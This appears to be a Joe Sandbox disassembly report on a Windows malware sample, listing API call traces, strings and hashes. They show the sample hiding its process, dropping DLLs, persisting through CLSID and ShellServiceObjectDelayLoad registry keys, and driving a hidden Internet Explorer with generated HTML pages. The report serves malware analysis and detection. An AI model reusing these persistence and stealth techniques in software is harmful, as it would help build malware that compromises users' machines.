                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Ogjdllpi$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-1498091450
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 89 4079e1-4079e3 82->89 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 90 4079b1 85->90 91 4079ab 85->91 86->80 87->82 92 4079ca-4079cd 87->92 90->82 91->85 92->82 93 4079c2 92->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
